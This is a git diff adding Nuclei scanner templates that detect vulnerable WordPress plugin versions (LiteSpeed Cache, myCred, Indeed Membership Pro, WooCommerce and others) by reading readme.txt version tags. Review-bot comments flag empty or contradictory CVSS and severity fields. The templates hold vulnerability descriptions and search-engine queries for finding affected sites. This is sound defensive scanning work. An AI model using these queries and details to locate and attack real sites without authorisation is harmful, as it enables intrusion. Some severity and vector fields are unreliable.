@@ -117869,6 +118047,7 @@ ./poc/wordpress/wpsynchro.yaml ./poc/wordpress/wptables-1c8f16aeda7755bc222dcfdc54f2e9b8.yaml ./poc/wordpress/wptables.yaml +./poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml ./poc/wordpress/wptf-image-gallery-fcb84176c85e1d348e75f01cbfe51bdb.yaml ./poc/wordpress/wptf-image-gallery.yaml ./poc/wordpress/wptools-1d6961a309e74315b43f9b84a7612ac8.yaml diff --git a/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml b/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml new file mode 100644 index 0000000000..b3e4f61557 --- /dev/null +++ b/poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml @@ -0,0 +1,59 @@ +id: login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b + +info: + name: > + Login As Users <= 1.4.2 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-as-users,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file 
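Review bot: The `classification` block of the new login-as-users template is left empty (`cvss-metrics`, `cvss-score` and `cve-id` have no values) and `shodan-query: 'vuln:'` carries no identifier, yet `tags` still includes `cve` and `severity: critical` is asserted with nothing in the file to back it. The same shape appears in mycred-0ba5901497b34cfef40a203e86fad82f.yaml and mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml later in this commit. Either fill these fields from the referenced Wordfence advisory or drop the `cve` tag and the empty keys, e.g. `tags: wordpress,wp-plugin,login-as-users,critical`, so that downstream filtering on the `cve` tag does not pick up templates that have no CVE id; the empty `description: >` should at least state what the check does. Each new file also ends without a trailing newline (`\ No newline at end of file`), which every template in this commit shares.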
diff --git a/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml b/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml new file mode 100644 index 0000000000..4d897f9d17 --- /dev/null +++ b/poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml @@ -0,0 +1,59 @@ +id: mycred-0ba5901497b34cfef40a203e86fad82f + +info: + name: > + myCred <= 2.7.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mycred,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml b/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml new file mode 100644 index 0000000000..ac703a52c3 --- /dev/null +++ b/poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml 
@@ -0,0 +1,59 @@ +id: mycred-5b86df80efa6b07ad02aa927c0bbfb50 + +info: + name: > + myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mycred,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-28000.yaml b/poc/cve/CVE-2024-28000.yaml new file mode 100644 index 0000000000..32b0603213 --- /dev/null +++ b/poc/cve/CVE-2024-28000.yaml 
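Review bot: The two mycred templates in this commit have a byte-identical `http` section (same readme.txt path, same `"mycred"` word matcher, same `compare_versions(version, '<= 2.7.2')` bound), so they will always fire together and differ only in `name`, `severity` and the reference URL. With both `description` fields empty there is nothing in the output that tells an operator which of the two findings is which, beyond the title. Consider folding them into one template with both references, or at minimum giving each a one-line `description` that names the affected functionality, as the other templates in this commit do.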
@@ -0,0 +1,59 @@ +id: CVE-2024-28000 + +info: + name: > + LiteSpeed Cache <= 6.3.0.1 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The LiteSpeed Cache plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.3.0.1. This is due to the plugin not properly restricting the role simulation functionality allowing a user to set their current ID to that of an administrator, if they have access to a valid hash which can be found in the debug logs or brute forced. This makes it possible for unauthenticated attackers to spoof their user ID to that of an administrator, and then create a new user account with the administrator role utilizing the /wp-json/wp/v2/users REST API endpoint. In some environments, the crawler may be disabled making this a non-exploitable issue in those instances. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/104badec-6e6e-44bb-936b-d135dd80890d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-28000 + metadata: + fofa-query: "wp-content/plugins/litespeed-cache/" + google-query: inurl:"/wp-content/plugins/litespeed-cache/" + shodan-query: 'vuln:CVE-2024-28000' + tags: cve,wordpress,wp-plugin,litespeed-cache,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "litespeed-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.0.1') \ No newline at end of 
file diff --git a/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml b/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml new file mode 100644 index 0000000000..4ac099b39a --- /dev/null +++ b/poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml 
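Review bot: The CVE-2024-28000 template only reads the `Stable tag` from readme.txt and compares it with `<= 6.3.0.1`, so a match means "readme reports a vulnerable version", not that the privilege-escalation path is reachable; the description itself notes the issue is non-exploitable where the crawler is disabled, and a readme.txt can be stale or left behind after an update, which makes both false positives and false negatives likely. The `description` should say this explicitly, e.g. a final sentence `This template is a version fingerprint based on readme.txt and does not verify exploitability; confirm manually before reporting.` The same caveat applies to every template added in this commit, since all of them share this `http` section verbatim.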
@@ -0,0 +1,59 @@ +id: CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f + +info: + name: > + Page Builder: Live Composer <= 1.5.47 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Page Builder: Live Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.5.47 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e661d3c-8acf-48c2-9e54-6913c65a46aa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-35768 + metadata: + fofa-query: "wp-content/plugins/live-composer-page-builder/" + google-query: inurl:"/wp-content/plugins/live-composer-page-builder/" + shodan-query: 'vuln:CVE-2024-35768' + tags: cve,wordpress,wp-plugin,live-composer-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/live-composer-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "live-composer-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.47') \ No newline at end of file diff --git a/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml b/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml new file mode 100644 index 0000000000..6949c1b300 --- /dev/null 
+++ b/poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a + +info: + name: > + Arkhe Blocks <= 2.22.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Arkhe Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.22.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1079282d-3183-4190-8a54-d6085d27935a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-38675 + metadata: + fofa-query: "wp-content/plugins/arkhe-blocks/" + google-query: inurl:"/wp-content/plugins/arkhe-blocks/" + shodan-query: 'vuln:CVE-2024-38675' + tags: cve,wordpress,wp-plugin,arkhe-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arkhe-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arkhe-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.22.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml b/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml new file mode 100644 index 0000000000..7780aab504 --- /dev/null 
+++ b/poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7 + +info: + name: > + WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 9.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-39666 + metadata: + fofa-query: "wp-content/plugins/woocommerce/" + google-query: inurl:"/wp-content/plugins/woocommerce/" + shodan-query: 'vuln:CVE-2024-39666' + tags: cve,wordpress,wp-plugin,woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml b/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml new file mode 100644 index 0000000000..920ed4e668 --- /dev/null +++ b/poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce + +info: + name: > + WC Marketplace <= 4.1.17 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WC Marketplace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.1.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5a263d5-df39-412e-b40a-e06e23168b7e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43213 + metadata: + fofa-query: "wp-content/plugins/dc-woocommerce-multi-vendor/" + google-query: inurl:"/wp-content/plugins/dc-woocommerce-multi-vendor/" + shodan-query: 'vuln:CVE-2024-43213' + tags: cve,wordpress,wp-plugin,dc-woocommerce-multi-vendor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dc-woocommerce-multi-vendor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dc-woocommerce-multi-vendor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.17') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml b/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml new file mode 100644 index 0000000000..b16d26e68d --- /dev/null 
+++ b/poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359 + +info: + name: > + Mediavine Control Panel <= 2.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mediavine Control Panel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.10.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d93c9c2d-1216-44e6-bdb8-d419a9ba6c6e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43218 + metadata: + fofa-query: "wp-content/plugins/mediavine-control-panel/" + google-query: inurl:"/wp-content/plugins/mediavine-control-panel/" + shodan-query: 'vuln:CVE-2024-43218' + tags: cve,wordpress,wp-plugin,mediavine-control-panel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mediavine-control-panel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mediavine-control-panel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.10.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml b/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml new file mode 100644 index 0000000000..1c6ffce4b2 --- /dev/null +++ b/poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156 + +info: + name: > + weMail <= 1.14.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The weMail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43238 + metadata: + fofa-query: "wp-content/plugins/wemail/" + google-query: inurl:"/wp-content/plugins/wemail/" + shodan-query: 'vuln:CVE-2024-43238' + tags: cve,wordpress,wp-plugin,wemail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wemail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.14.5') \ No newline at end of file 
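Review bot: The `description` in the CVE-2024-43238 template describes a Reflected Cross-Site Scripting issue with the stored-XSS wording ("will execute whenever a user accesses an injected page"), which contradicts both the `name` and the `UI:R` in the CVSS vector. The CVE-2024-43213 template earlier in this commit uses the reflected phrasing, `... inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.`; if the referenced advisory reads that way, align this description with it.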
diff --git a/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml b/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml new file mode 100644 index 0000000000..100b314beb --- /dev/null +++ b/poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d + +info: + name: > + Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.11.4 due to missing validation on the 'course_id' user controlled key. This makes it possible for authenticated attackers, with student-level access and above, to review courses they don't have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43239 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-43239' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml b/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml new file mode 100644 index 0000000000..09c60b97d4 --- /dev/null 
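Review bot: The classification block contradicts the description: `cvss-metrics` says `PR:N` and `I:L`, while the description says the attacker needs Student-level authentication and gains read access to courses (a confidentiality, not integrity, impact), and `severity: low` does not match the stated 5.3, which is CVSS Medium. Either the vector/score or the description was copied from a different record; check the Wordfence entry linked in `reference` and make the three agree. If the description is right, the vector would be along the lines of `AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` (4.3), but take it from the record rather than from this note.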
+++ b/poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43240-602dd094f3b3105ea72425933e143ccf + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 12.6. This is due to the plugin not properly restricting access to functionality that allows privilege assignment. This makes it possible for unauthenticated attackers to gain access to accounts that have higher privileges, such as administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb4a8ba-33f1-4183-be76-72f6a99fc1fa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43240 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43240' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml b/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml new file mode 100644 index 0000000000..59b6633220 
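Review bot: For a `critical` unauthenticated privilege-escalation finding, the only evidence the template collects is the `Stable tag` regex against `/wp-content/plugins/indeed-membership-pro/readme.txt`. Indeed Membership Pro appears to be a commercially distributed plugin rather than a wordpress.org one, so whether its package ships a `readme.txt` with a `Stable tag:` header at all is worth confirming; if it does not, the template silently never fires on real targets. Since the advisory gives no safe verification request, at minimum make the description say the detection is version-based, e.g. `Detection relies on the readme.txt Stable tag and does not verify the privilege-assignment functionality.`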
--- /dev/null +++ b/poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43241-808351d5b94024e25294db4171fbaa2f + +info: + name: > + Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43241 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43241' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file 
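Review bot: The `word` matcher requires the literal string `indeed-membership-pro` in the readme body, but a plugin's readme.txt does not necessarily contain its own directory slug, and with `matchers-condition: and` a readme that lacks it produces a silent miss even when the Stable tag is in range. Check the actual readme; if the slug is not guaranteed, match on the readme's title line (`=== Indeed Membership Pro` or whatever it actually is) or drop the word matcher and rely on the `Stable tag:` regex having matched. The same slug-in-readme assumption is repeated in the other templates for this plugin.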
diff --git a/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml b/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml new file mode 100644 index 0000000000..15b2f241bc --- /dev/null +++ b/poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43242 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43242' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file 
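Review bot: `severity: critical` and the `critical` tag disagree with the 8.1 score and `AC:H` vector given two lines above, which map to CVSS High, and the description itself notes that no POP chain is known in the plugin. Set `severity: high` and the tag to `high` so consumers that filter by nuclei severity are not paged for an unconfirmed deserialization sink. The detection is a readme Stable-tag check only, so a match does not show that a gadget chain exists on the target.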
